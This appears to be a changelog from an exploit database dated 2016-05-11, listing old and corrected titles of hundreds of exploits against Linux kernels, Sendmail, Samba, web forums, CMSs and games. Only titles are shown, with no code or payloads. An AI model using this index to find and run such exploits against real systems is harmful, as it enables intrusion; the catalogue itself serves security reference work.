DB: 2016-05-11

9 new exploits Linux Kernel 2.2.x - 2.4.x - ptrace/kmod Local Root Exploit Linux Kernel 2.2.x / 2.4.x (Redhat) - ptrace/kmod Local Root Exploit Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit Sendmail <= 8.12.8 - prescan() BSD Remote Root Exploit Gopherd <= 3.0.5 FTP Gateway Remote Overflow Exploit Gopherd <= 3.0.5 - FTP Gateway Remote Overflow Exploit mIRC 6.1 - _IRC_ Protocol Remote Buffer Overflow Exploit mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow Exploit Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit Apache mod_gzip (with debug_mode) <= 1.2.26.1a - Remote Exploit Linux Kernel 2.4.22 - _do_brk()_ Local Root Exploit (PoC) Linux Kernel 2.4.22 - 'do_brk()' Local Root Exploit (Proof of Concept) Linux Kernel <= 2.4.22 - (do_brk) Local Root Exploit (working) Linux Kernel <= 2.4.22 - 'do_brk' Local Root Exploit Xsok 1.02 - _-xsokdir_ Local Buffer Overflow Game Exploit Linux Kernel <= 2.4.23 / <= 2.6.0 - _do_mremap_ Local Proof of Concept (1) Linux Kernel <= 2.4.23 / <= 2.6.0 - _do_mremap_ Local Proof of Concept (2) Xsok 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (1) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - mremap() Bound Checking Root Exploit Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit Serv-U FTPD 3.x/4.x _SITE CHMOD_ Command Remote Exploit Serv-U FTPD 3.x/4.x- 'SITE CHMOD' Command Remote Exploit Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - _mremap()_ Local Proof-of-Concept (2) Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Proof of Concept (2) Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - _mremap()_ Missing _do_munmap_ Exploit Red Faction <= 1.20 Server Reply Remote Buffer Overflow Exploit Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit Red Faction <= 1.20 - Server Reply Remote Buffer Overflow Exploit eMule <= 0.42d IRC Remote Buffer Overflow Exploit eMule <= 0.42d - IRC Remote Buffer Overflow Exploit GnomeHack Local Buffer Overflow Exploit (gid=games) GnomeHack - Local Buffer Overflow Exploit (gid=games) Kwintv Local Buffer Overflow Exploit (gid=video(33)) Kwintv - Local Buffer Overflow Exploit (gid=video(33)) Redhat 6.1 man Local Exploit (egid 15) Redhat 6.1 man - Local Exploit (egid 15) Linux Kernel <= 2.6.3 - (setsockopt) Local Denial of Service Exploit Linux Kernel <= 2.6.3 - 'setsockopt' Local Denial of Service Exploit Linux Kernel 2.4.x - 2.6.x - Assembler Inline Function Local DoS Exploit rlpr <= 2.04 msg() Remote Format String Exploit MPlayer <= 1.0pre4 GUI filename handling Overflow Exploit Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local DoS Exploit rlpr <= 2.04 - msg() Remote Format String Exploit MPlayer <= 1.0pre4 GUI - filename handling Overflow Exploit Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit Samba <= 3.0.4 - SWAT Authorization Buffer Overflow Exploit OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit OpenFTPD <= 0.30.1 - (message system) Remote Shell Exploit Linux Kernel - File Offset Pointer Handling Memory Disclosure Exploit Linux Kernel <= 2.4.26- File Offset Pointer Handling Memory Disclosure Exploit Ollydbg <= 1.10 Format String Bug Ollydbg <= 1.10 - Format String Bug Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit Mac OS X <= 10.3.3 - AppleFileServer Remote Root Overflow Exploit Remote CVS <= 1.11.15 - (error_prog_name) Remote Exploit LibPNG <= 1.2.5 - png_jmpbuf() Local Buffer Overflow Exploit AOL Instant Messenger AIM _Away_ Message Local Exploit AOL Instant Messenger AIM - 'Away' Message Local Exploit Ground Control <= 1.0.0.7 (Server/Client) Denial of Service Exploit Ground Control <= 1.0.0.7 - (Server/Client) Denial of Service Exploit AOL Instant Messenger AIM _Away_ Message Remote Exploit AOL Instant Messenger AIM - 'Away' Message Remote Exploit (2) Silent Storm Portal Multiple Vulnerabilities Silent Storm Portal - Multiple Vulnerabilities YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit YahooPOPs <= 1.6 - SMTP Port Buffer Overflow Exploit Monit <= 4.2 Basic Authentication Remote Root Exploit Monit <= 4.2 - Basic Authentication Remote Root Exploit YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit YahooPOPs <= 1.6 - SMTP Remote Buffer Overflow Exploit Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit Ability Server <= 2.34 - (APPE) Remote Buffer Overflow Exploit Chatman <= 1.5.1 RC1 Broadcast Crash Exploit Flash Messaging <= 5.2.0g Remote Denial of Service Exploit Chatman <= 1.5.1 RC1 - Broadcast Crash Exploit Flash Messaging <= 5.2.0g - Remote Denial of Service Exploit CoffeeCup FTP Clients (Direct <= 6.2.0.62) (Free <= 3.0.0.10) BoF Exploit Halo <= 1.05 Broadcast Client Crash Exploit CoffeeCup FTP Clients (Direct <= 6.2.0.62) (Free <= 3.0.0.10) - BoF Exploit Halo <= 1.05 - Broadcast Client Crash Exploit Soldier of Fortune II <= 1.3 Server/Client Denial of Service Exploit Soldier of Fortune II <= 1.3 Server/Client - Denial of Service Exploit Star Wars Battlefront <= 1.1 Fake Players Denial of Service Exploit Star Wars Battlefront <= 1.1 - Fake Players Denial of Service Exploit PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit PHP <= 4.3.7/ 5.0.0RC3 - memory_limit Remote Exploit WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit WS_FTP Server <= 5.03 - MKD Remote Buffer Overflow Exploit Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit Jana Server <= 2.4.4 - (http/pna) Denial of Service Exploit Kreed <= 1.05 Format String and Denial of Service Exploit Kreed <= 1.05 - Format String and Denial of Service Exploit Codename Eagle <= 1.42 Socket Unreacheable DoS Exploit Codename Eagle <= 1.42 - Socket Unreacheable DoS Exploit Linux Kernel <= 2.6.9 / 2.4.22-28 - (igmp.c) Local Denial of Service Exploit Linux Kernel <= 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service Exploit WinRAR <= 3.4.1 Corrupt ZIP File Vulnerability PoC Cscope <= 15.5 Symlink Vulnerability Exploit WinRAR <= 3.4.1 - Corrupt ZIP File Vulnerability PoC Cscope <= 15.5 - Symlink Vulnerability Exploit Linux Kernel 2.6.x - chown() Group Ownership Alteration Exploit Linux Kernel 2.6.x (Slackware 9.1/ Debian 3.0) - chown() Group Ownership Alteration Exploit Netcat 1.1 - _-e_ Switch Remote Buffer Overflow Exploit PHP <= 4.3.7 openlog() Buffer Overflow Exploit Netcat 1.1 - '-e' Switch Remote Buffer Overflow Exploit PHP <= 4.3.7 - openlog() Buffer Overflow Exploit phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm) phpBB <= 2.0.10 - Bot Install (Altavista) (ssh.D.Worm) Gore <= 1.50 Socket Unreacheable Denial of Service Exploit Gore <= 1.50 - Socket Unreacheable Denial of Service Exploit Exim <= 4.41 dns_build_reverse Local Exploit PoC Exim <= 4.41 - dns_build_reverse Local Exploit PoC Peer2Mail <= 1.4 Encrypted Password Dumper Exploit Peer2Mail <= 1.4 - Encrypted Password Dumper Exploit Mac OS X <= 10.3.7 Input Validation Flaw parse_machfile() DoS Mac OS X <= 10.3.7 - Input Validation Flaw parse_machfile() DoS Xpand Rally <= 1.0.0.0 (Server/Clients) Crash Exploit Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit Painkiller <= 1.35 in-game cd-key alpha-numeric Buffer Overflow Exploit Painkiller <= 1.35 - in-game cd-key alpha-numeric Buffer Overflow Exploit Armagetron Advanced <= 0.2.7.0 Server Crash Exploit Armagetron Advanced <= 0.2.7.0 - Server Crash Exploit MercuryBoard <= 1.1.1 Working SQL Injection MercuryBoard <= 1.1.1 - SQL Injection GNU a2ps _Anything to PostScript_ Local Exploit (not suid) GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID) vBulletin <= 3.0.4 - _forumdisplay.php_ Code Execution vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (1) vBulletin <= 3.0.4 - _forumdisplay.php_ Code Execution (part 2) Serv-U 4.x _site chmod_ Remote Buffer Overflow Exploit vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2) Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit 3Com 3CDaemon FTP Unauthorized _USER_ Remote BoF Exploit 3Com 3CDaemon FTP - Unauthorized 'USER' Remote BoF Exploit vBulletin <= 3.0.6 php Code Injection vBulletin <= 3.0.6 - PHP Code Injection Soldier of Fortune 2 <= 1.03 - _cl_guid_ - Server Crash Soldier of Fortune 2 <= 1.03 - 'cl_guid' - Server Crash Knet <= 1.04c Buffer Overflow Denial of Service Exploit Knet <= 1.04c - Buffer Overflow Denial of Service Exploit Scrapland <= 1.0 Server Termination Denial of Service Exploit Scrapland <= 1.0 - Server Termination Denial of Service Exploit Apache <= 2.0.52 HTTP GET request Denial of Service Exploit Nokia Symbian 60 (Bluetooth Nickname) Remote Restart (update) Apache <= 2.0.52 - HTTP GET request Denial of Service Exploit Nokia Symbian 60 (Bluetooth Nickname) Remote Restart (2) Microsoft Internet Explorer _mshtml.dll_ CSS Parsing Buffer Overflow Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow Ethereal <= 0.10.9 - _3G-A11_ - Remote Buffer Overflow Exploit (2) Ethereal <= 0.10.9 - '3G-A11' Remote Buffer Overflow Exploit (Windows) Ethereal <= 0.10.9 - _3G-A11_ Remote Buffer Overflow Exploit Ethereal <= 0.10.9 - '3G-A11' Remote Buffer Overflow Exploit (Linux) PHP-Nuke 6.x - 7.6 Top module Remote SQL Injection Exploit (working) PHP-Nuke 6.x - 7.6 Top module - Remote SQL Injection Exploit HP-UX FTPD <= 1.1.214.4 - _REST_ Remote Brute Force Exploit HP-UX FTPD <= 1.1.214.4 - 'REST' Remote Brute Force Exploit Invision Power Board <= 2.0.3 Login.PHP SQL Injection Exploit Invision Power Board <= 2.0.3 Login.PHP SQL Injection (tutorial) Invision Power Board <= 2.0.3 - Login.PHP SQL Injection Exploit Invision Power Board <= 2.0.3 - Login.PHP SQL Injection (tutorial) phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (perl) phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (php) phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (php 2) phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (Perl) phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1) phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2) Ethereal <= 0.10.10 (SIP) Protocol Dissector Remote BoF Exploit MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit Ethereal <= 0.10.10 - (SIP) Protocol Dissector Remote BoF Exploit MyBulletinBoard (MyBB) <= 1.00 RC4 - SQL Injection Exploit Microsoft Internet Explorer - javascript _window()_ Crash Microsoft Internet Explorer - javascript 'window()' Crash Kaspersky AntiVirus - _klif.sys_ Privilege Escalation Vulnerability Kaspersky AntiVirus - 'klif.sys' Privilege Escalation Vulnerability Invision Power Board <= 1.3.1 Login.PHP SQL Injection (working) Invision Power Board <= 1.3.1 - Login.PHP SQL Injection WordPress <= 1.5.1.1 - _add new admin_ SQL Injection Exploit WordPress <= 1.5.1.1 - 'add new admin' SQL Injection Exploit Mozilla Firefox <= 1.0.4 - _Set As Wallpaper_ Code Execution Exploit Mozilla Firefox <= 1.0.4 - 'Set As Wallpaper' Code Execution Exploit Scorched 3D <= 39.1 - Multiple Vulnerabilities (All-in-One) (PoC) Scorched 3D <= 39.1 - Multiple Vulnerabilities (PoC) XOOPS (wfdownloads) 2.05 Module Multiple Vulnerabilities Exploit XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities Linux Kernel <= 2.6.11 - 'k-rad3.c' (CPL 0) Local Root Exploit Linux Kernel <= 2.6.9 / <= 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit Alien Arena 2006 Gold Edition <= 5.00 - Multiple Vulnerabilities Exploit Alien Arena 2006 Gold Edition <= 5.00 - Multiple Vulnerabilities nodez <= 4.6.1.1 mercury Multiple Vulnerabilities nodez <= 4.6.1.1 mercury - Multiple Vulnerabilities gCards <= 1.45 - Multiple Vulnerabilities All-In-One Exploit gCards <= 1.45 - Multiple Vulnerabilities Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure / Denial of Service Exploit Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit OpenTTD <= 0.4.7 - (multiple vulnerabilities) Denial of Service Exploit OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit Apple Mac OS X Safari <= 2.0.3 (417.9.2) Multiple Vulnerabilities PoC Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC) PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities Exploit PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities outgun <= 1.0.3 bot 2 - Multiple Vulnerabilities Exploit outgun <= 1.0.3 bot 2 - Multiple Vulnerabilities raydium <= svn 309 - Multiple Vulnerabilities Exploit raydium <= svn 309 - Multiple Vulnerabilities PunkBuster < 1.229 (WebTool Service) Remote Buffer Overflow DoS PunkBuster < 1.229 - (WebTool Service) Remote Buffer Overflow DoS Ultimate PHP Board <= 1.96 GOLD Multiple Vulnerabilities Exploit Ultimate PHP Board <= 1.96 GOLD - Multiple Vulnerabilities Light Blog Remote Multiple Vulnerabilities Exploit Light Blog Remote - Multiple Vulnerabilities Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept contentnow 1.30 (local/upload/delete) Multiple Vulnerabilities contentnow 1.30 - (local/upload/delete) Multiple Vulnerabilities contentnow 1.30 (upload/XSS) Multiple Vulnerabilities contentnow 1.30 - (Upload/XSS) Multiple Vulnerabilities torrentflux <= 2.2 (create/exec/delete) Multiple Vulnerabilities torrentflux <= 2.2 - (create/exec/delete) Multiple Vulnerabilities Messagerie Locale (centre.php) Remote File Inclusion Vulnerability Site News (centre.php) Remote File Inclusion Vulnerability Messagerie Locale (centre.php) - Remote File Inclusion Vulnerability Site News (centre.php) - Remote File Inclusion Vulnerability kubix <= 0.7 - Multiple Vulnerabilities Exploit kubix <= 0.7 - Multiple Vulnerabilities BBS E-Market Professional (Path Disclosure/Include) Multiple Vulnerabilities BBS E-Market Professional - (Path Disclosure/Include) Multiple Vulnerabilities F-Prot Antivirus 4.6.6 (ACE) Denial of Service Exploit F-Prot Antivirus 4.6.6 - (ACE) Denial of Service Exploit open newsletter <= 2.5 - Multiple Vulnerabilities Exploit (update) open newsletter <= 2.5 - Multiple Vulnerabilities (2) eNdonesia 8.4 (mod.php/friend.php/admin.php) Multiple Vulnerabilities eNdonesia 8.4 - (mod.php/friend.php/admin.php) Multiple Vulnerabilities php-update <= 2.7 - Multiple Vulnerabilities Exploit php-update <= 2.7 - Multiple Vulnerabilities ig shop 1.0 (eval/SQL Injection) Multiple Vulnerabilities ig shop 1.0 - (eval/SQL Injection) Multiple Vulnerabilities QUOTE&ORDERING SYSTEM 1.0 (ordernum) Multiple Vulnerabilities QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities vp-asp shopping cart 6.09 (SQL/XSS) Multiple Vulnerabilities vp-asp shopping cart 6.09 - (SQL/XSS) Multiple Vulnerabilities Aztek Forum 4.0 - Multiple Vulnerabilities Exploit Aztek Forum 4.0 - Multiple Vulnerabilities otscms <= 2.1.5 (SQL/XSS) Multiple Vulnerabilities otscms <= 2.1.5 - (SQL/XSS) Multiple Vulnerabilities uTorrent 1.6 build 474 (announce) Key Remote Heap Overflow Exploit uTorrent 1.6 build 474 - (announce) Key Remote Heap Overflow Exploit Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit Connectix Boards <= 0.7 - (p_skin) Multiple Vulnerabilities qdblog 0.4 (SQL Injection/LFI) Multiple Vulnerabilities qdblog 0.4 - (SQL Injection/LFI) Multiple Vulnerabilities Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability Censura 1.15.04 - (censura.php vendorid) SQL Injection Vulnerability runawaysoft haber portal 1.0 (tr) Multiple Vulnerabilities runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities netclassifieds (SQL/XSS/full path) Multiple Vulnerabilities netclassifieds - (SQL/XSS/full path) Multiple Vulnerabilities bugmall shopping cart 2.5 (SQL/XSS) Multiple Vulnerabilities bugmall shopping cart 2.5 - (SQL/XSS) Multiple Vulnerabilities Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak PoC Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak Proof of Concept Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility Pictures Rating - (index.php msgid) Remote SQL Injection Vulnerbility Joomla Component Nice Talk <= 0.9.3 (tagid) SQL Injection Vulnerability Joomla Component Nice Talk <= 0.9.3 - (tagid) SQL Injection Vulnerability Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day) Xitami Web Server 2.5 - (If-Modified-Since) Remote BoF Exploit (0day) Linux Kernel 2.4/2.6 - x86-64 System Call Emulation Exploit Linux Kernel 2.4 / 2.6 x86-64 - System Call Emulation Exploit else if CMS 0.6 - Multiple Vulnerabilities / Exploit else if CMS 0.6 - Multiple Vulnerabilities Php-Stats 0.1.9.2 - Multiple Vulnerabilities Exploit Php-Stats 0.1.9.2 - Multiple Vulnerabilities Apple Mac OS X 10.4.x Kernel - i386_set_ldt() Integer Overflow PoC Apple Mac OS X 10.4.x Kernel - i386_set_ldt() Integer Overflow Proof of Concept WorkingOnWeb 2.0.1400 events.php Remote SQL Injection Vulnerability WorkingOnWeb 2.0.1400 - events.php Remote SQL Injection Vulnerability Apple Mac OS X xnu <= 1228.0 - mach-o Local Kernel Denial of Service PoC Apple Mac OS X xnu <= 1228.0 - mach-o Local Kernel Denial of Service Proof of Concept portalapp 4.0 (SQL/XSS/auth bypasses) Multiple Vulnerabilities portalapp 4.0 - (SQL/XSS/auth bypasses) Multiple Vulnerabilities evilboard 0.1a (SQL/XSS) Multiple Vulnerabilities evilboard 0.1a - (SQL/XSS) Multiple Vulnerabilities Evilsentinel <= 1.0.9 (multiple vulnerabilities) Disable Exploit Evilsentinel <= 1.0.9 - (Multiple Vulnerabilities) Disable Exploit blogcms 4.2.1b (SQL/XSS) Multiple Vulnerabilities blogcms 4.2.1b - (SQL/XSS) Multiple Vulnerabilities bloofox 0.3 (SQL/fd) Multiple Vulnerabilities bloofox 0.3 - (SQL/fd) Multiple Vulnerabilities Liquid-Silver CMS 0.1 (update) Local File Inclusion Vulnerability Liquid-Silver CMS 0.1 - (update) Local File Inclusion Vulnerability simple forum 3.2 (fd/XSS) Multiple Vulnerabilities simple forum 3.2 - (fd/XSS) Multiple Vulnerabilities Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability Mambo Component Sermon 0.2 - (gid) SQL Injection Vulnerability Philips VOIP841 (Firmware <= 1.0.4.800) Multiple Vulnerabilities Philips VOIP841 - (Firmware <= 1.0.4.800) Multiple Vulnerabilities pigyard art gallery Multiple Vulnerabilities pigyard art gallery - Multiple Vulnerabilities XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability XOOPS Module My_eGallery 3.04 (gid) SQL Injection Vulnerability XOOPS Module Gallery 0.2.2 - (gid) Remote SQL Injection Vulnerability XOOPS Module My_eGallery 3.04 - (gid) SQL Injection Vulnerability easycalendar <= 4.0tr Multiple Vulnerabilities easygallery <= 5.0tr Multiple Vulnerabilities easycalendar <= 4.0tr - Multiple Vulnerabilities easygallery <= 5.0tr - Multiple Vulnerabilities Nuked-Klan <= 1.7.6 - Multiple Vulnerabilities Exploit Nuked-Klan <= 1.7.6 - Multiple Vulnerabilities RedDot CMS 7.5 (LngId) Remote SQL Injection Exploit RedDot CMS 7.5 - (LngId) Remote SQL Injection Exploit minibb 2.2 (css/SQL/fpd) Multiple Vulnerabilities minibb 2.2 - (css/SQL/fpd) Multiple Vulnerabilities siteman 2.x (exec/LFI/XSS) Multiple Vulnerabilities siteman 2.x - (exec/LFI/XSS) Multiple Vulnerabilities megabbs forum 2.2 (SQL/XSS) Multiple Vulnerabilities megabbs forum 2.2 - (SQL/XSS) Multiple Vulnerabilities Joomla Component paxxgallery 0.2 (gid) Blind SQL Injection Exploit Joomla Component paxxgallery 0.2 - (gid) Blind SQL Injection Exploit cplinks 1.03 (bypass/SQL/xxs) Multiple Vulnerabilities cplinks 1.03 - (bypass/SQL/xxs) Multiple Vulnerabilities deluxebb <= 1.2 - Multiple Vulnerabilities Exploit deluxebb <= 1.2 - Multiple Vulnerabilities Phoenix View CMS <= Pre Alpha2 (SQL/LFI/XSS) Multiple Vulnerabilities Phoenix View CMS <= Pre Alpha2 - (SQL/LFI/XSS) Multiple Vulnerabilities Ktools PhotoStore <= 3.5.1 (gallery.php gid) SQL Injection Vulnerability Ktools PhotoStore <= 3.5.1 - (gallery.php gid) SQL Injection Vulnerability idautomation bar code ActiveX Multiple Vulnerabilities idautomation bar code ActiveX - Multiple Vulnerabilities ecms 0.4.2 (SQL/pb) Multiple Vulnerabilities Mantis Bug Tracker 1.1.1 (CE/XSS/CSRF) Multiple Vulnerabilities ecms 0.4.2 - (SQL/pb) Multiple Vulnerabilities Mantis Bug Tracker 1.1.1 - (CE/XSS/CSRF) Multiple Vulnerabilities mebiblio 0.4.7 (SQL/upload/XSS) Multiple Vulnerabilities mebiblio 0.4.7 - (SQL/upload/XSS) Multiple Vulnerabilities smeweb 1.4b (SQL/XSS) Multiple Vulnerabilities smeweb 1.4b - (SQL/XSS) Multiple Vulnerabilities PHP-Address Book <= 3.1.5 (SQL/XSS) Multiple Vulnerabilities PHP-Address Book <= 3.1.5 - (SQL/XSS) Multiple Vulnerabilities 427bb 2.3.1 (SQL/XSS) Multiple Vulnerabilities 427bb 2.3.1 - (SQL/XSS) Multiple Vulnerabilities Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulnerabilities Black Ice Software Inc Barcode SDK - (BIDIB.ocx) Multiple Vulnerabilities real estate Web site 1.0 (SQL/XSS) Multiple Vulnerabilities telephone directory 2008 (SQL/XSS) Multiple Vulnerabilities real estate Web site 1.0 - (SQL/XSS) Multiple Vulnerabilities telephone directory 2008 - (SQL/XSS) Multiple Vulnerabilities gravity board x 2.0 beta (SQL/XSS) Multiple Vulnerabilities gravity board x 2.0 beta - (SQL/XSS) Multiple Vulnerabilities butterfly organizer 2.0.0 (SQL/XSS) Multiple Vulnerabilities butterfly organizer 2.0.0 - (SQL/XSS) Multiple Vulnerabilities doITlive CMS <= 2.50 (SQL Injection/XSS) Multiple Vulnerabilities doITlive CMS <= 2.50 - (SQL Injection/XSS) Multiple Vulnerabilities ownrs blog beta3 (SQL/XSS) Multiple Vulnerabilities ownrs blog beta3 - (SQL/XSS) Multiple Vulnerabilities sitexs CMS 0.1.1 (upload/XSS) Multiple Vulnerabilities sitexs CMS 0.1.1 - (upload/XSS) Multiple Vulnerabilities shibby shop <= 2.2 (SQL/update) Multiple Vulnerabilities shibby shop <= 2.2 - (SQL/update) Multiple Vulnerabilities polypager <= 1.0rc2 (SQL/XSS) Multiple Vulnerabilities polypager <= 1.0rc2 - (SQL/XSS) Multiple Vulnerabilities otmanager CMS 24a (LFI/XSS) Multiple Vulnerabilities w1l3d4 philboard 1.2 (blind sql/XSS) Multiple Vulnerabilities otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities Thelia 1.3.5 - Multiple Vulnerabilities Exploit Thelia 1.3.5 - Multiple Vulnerabilities contentnow 1.4.1 (upload/XSS) Multiple Vulnerabilities contentnow 1.4.1 - (upload/XSS) Multiple Vulnerabilities trixbox (langChoice) - Local File Inclusion Exploit (connect-back) (2) trixbox - (langChoice) Local File Inclusion Exploit (connect-back) (2) Trixbox 2.6.1 - (langChoice) Remote Root Exploit (py) Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python) jsite 1.0 oe (SQL/LFI) Multiple Vulnerabilities jsite 1.0 oe - (SQL/LFI) Multiple Vulnerabilities Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit Bea Weblogic Apache Connector - Code Execution and Denial of Service Exploit e-vision CMS <= 2.02 (SQL/upload/ig) Multiple Vulnerabilities k-links directory (SQL/XSS) Multiple Vulnerabilities e-vision CMS <= 2.02 - (SQL/upload/ig) Multiple Vulnerabilities k-links directory - (SQL/XSS) Multiple Vulnerabilities Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities Ppim <= 1.0 - (Arbitrary File Delete/XSS) Multiple Vulnerabilities Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities Ppim <= 1.0 - (upload/change password) Multiple Vulnerabilities k-rate (SQL/XSS) Multiple Vulnerabilities k-rate - (SQL/XSS) Multiple Vulnerabilities Invision Power Board <= 2.3.5 - Multiple Vulnerabilities Exploit (revised) Invision Power Board <= 2.3.5 - Multiple Vulnerabilities (2) brim 2.0.0 (SQL/XSS) Multiple Vulnerabilities brim 2.0.0 - (SQL/XSS) Multiple Vulnerabilities aspwebalbum 3.2 (upload/SQL/XSS) Multiple Vulnerabilities aspwebalbum 3.2 - (upload/SQL/XSS) Multiple Vulnerabilities qwicsite pro (SQL/XSS) Multiple Vulnerabilities qwicsite pro - (SQL/XSS) Multiple Vulnerabilities Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities Hot Links SQL-PHP 3 - (report.php) Multiple Vulnerabilities Availscript Article Script (articles.php) Multiple Vulnerabilities Availscript Article Script - (articles.php) Multiple Vulnerabilities Availscript Photo Album (pics.php) Multiple Vulnerabilities Availscript Photo Album - (pics.php) Multiple Vulnerabilities phpvid 1.1 0- (XSS/SQL) Multiple Vulnerabilities phpvid 1.1 0 - (XSS/SQL) Multiple Vulnerabilities php infoboard 7 - plus Multiple Vulnerabilities php infoboard 7 plus - Multiple Vulnerabilities camera life 2.6.2b4 (SQL/XSS) Multiple Vulnerabilities camera life 2.6.2b4 - (SQL/XSS) Multiple Vulnerabilities mini-pub 0.3 (lfd/ce) Multiple Vulnerabilities mini-pub 0.3 - (LFD/CE) Multiple Vulnerabilities Nuked-klaN <= 1.7.7 / <= SP4.4 - Multiple Vulnerabilities Exploit Nuked-klaN <= 1.7.7 / <= SP4.4 - Multiple Vulnerabilities mystats (hits.php) Multiple Vulnerabilities Exploit mystats - (hits.php) Multiple Vulnerabilities Vivvo CMS <= 3.4 - Multiple Vulnerabilities Destroyer Exploit Vivvo CMS <= 3.4 - Multiple Vulnerabilities websvn <= 2.0 - (XSS/fh/ce) Multiple Vulnerabilities websvn <= 2.0 - (XSS/fh/CE) Multiple Vulnerabilities db Software Laboratory VImpX (VImpX.ocx) Multiple Vulnerabilities db Software Laboratory VImpX - (VImpX.ocx) Multiple Vulnerabilities phpdaily (SQL/XSS/lfd) Multiple Vulnerabilities phpdaily - (SQL/XSS/lfd) Multiple Vulnerabilities questcms - (XSS/directory traversal/SQL) Multiple Vulnerabilities questcms - (XSS/Directory Traversal/SQL) Multiple Vulnerabilities apartment search script (rfu/XSS) Multiple Vulnerabilities apartment search script - (RFU/XSS) Multiple Vulnerabilities MatPo Link 1.2b (Blind SQL Injection/XSS) Multiple Vulnerabilities MatPo Link 1.2b - (Blind SQL Injection/XSS) Multiple Vulnerabilities WEBBDOMAIN WebShop 1.02 (SQL/XSS) Multiple Vulnerabilities WEBBDOMAIN WebShop 1.02 - (SQL/XSS) Multiple Vulnerabilities pre multi-vendor shopping malls Multiple Vulnerabilities pre multi-vendor shopping malls - Multiple Vulnerabilities Pre ADS Portal <= 2.0 (Auth Bypass/XSS) Multiple Vulnerabilities Pre ADS Portal <= 2.0 - (Auth Bypass/XSS) Multiple Vulnerabilities Mini Web Calendar 1.2 (File Disclosure/XSS) Multiple Vulnerabilities Mini Web Calendar 1.2 - (File Disclosure/XSS) Multiple Vulnerabilities zeeproperty 1.0 (upload/XSS) Multiple Vulnerabilities zeeproperty 1.0 - (upload/XSS) Multiple Vulnerabilities Openfire Server <= 3.6.0a (Auth Bypass/SQL/XSS) Multiple Vulnerabilities Openfire Server <= 3.6.0a - (Auth Bypass/SQL/XSS) Multiple Vulnerabilities AJSquare Free Polling Script (DB) Multiple Vulnerabilities AJSquare Free Polling Script - (DB) Multiple Vulnerabilities turnkeyforms Web Hosting Directory Multiple Vulnerabilities turnkeyforms Web Hosting Directory - Multiple Vulnerabilities GS Real Estate Portal US/International Module Multiple Vulnerabilities GS Real Estate Portal US/International Module - Multiple Vulnerabilities bandwebsite 1.5 (SQL/XSS) Multiple Vulnerabilities bandwebsite 1.5 - (SQL/XSS) Multiple Vulnerabilities chipmunk topsites (auth bypass/XSS) Multiple 